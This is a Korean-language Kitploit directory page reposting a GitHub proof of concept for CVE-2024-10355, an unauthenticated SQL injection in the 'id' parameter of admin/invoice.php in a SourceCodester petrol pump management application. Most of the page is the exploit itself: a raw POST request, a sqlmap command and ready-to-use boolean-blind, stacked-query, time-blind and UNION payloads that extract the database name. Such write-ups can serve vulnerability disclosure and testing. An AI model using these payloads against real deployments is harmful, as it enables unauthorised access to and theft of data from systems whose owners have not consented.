Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10355 | Kitploit
도구/GitHubGitHub/k1nakoo/cve-2024-10355
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubk1nakoo/cve-2024-10355

CVE-2024-10355

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

소스 코드

주유소 펌프 관리 소프트웨어 무료 다운로드 | SourceCodester

설명

sourcecodester Petrol pump management software v1.0에서 SQL 인젝션 취약점이 발견되었습니다. admin\invoice.php 파일의 일부 알려지지 않은 기능에 영향을 미치는 높은 위험도로 평가되는 취약점으로, id 매개변수를 사용하여 악의적인 SQL 문을 구성해 민감한 정보를 획득함으로써 피해를 초래할 수 있습니다.

취약점 분석

admin\invoice.php

image-20241023165652040

여기서는 사용자 입력 $_POST['id']가 SQL 쿼리 문에 직접 연결되므로 SQL 인젝션 공격에 취약함을 알 수 있습니다.

취약점 재현

image-20241023165723658

root@kitploit:~
POST /admin/invoice.php HTTP/1.1
Host: 10.151.167.168:6677
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

id=1*

패킷을 저장하고 sqlmap 공격을 사용합니다.

root@kitploit:~
python3 sqlmap.py --random-agent -r data.txt --risk 3 --batch

image-20241023165827647

root@kitploit:~
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6094' OR 1911=1911 AND 'hAoG'='hAoG

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1041 FROM (SELECT(SLEEP(5)))UTeR) AND 'HnhT'='HnhT

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176626b71,0x6b57657774656652476e4d594f6959545363546f73424a4c547364484a4d47696247447769514653,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---

패킷을 살펴보면 쿠키 값을 추가하지 않았습니다. 즉, 인증 없이 로그인하지 않고도 원격으로 공격을 시작할 수 있음을 보여줍니다.

이 페이로드는 time-based blind, boolean-based blind, stacked queries 및 UNION query 두 가지 인젝션 방법을 활용하여 데이터베이스 이름을 성공적으로 추출하는 것을 확인할 수 있습니다.

도구 다운로드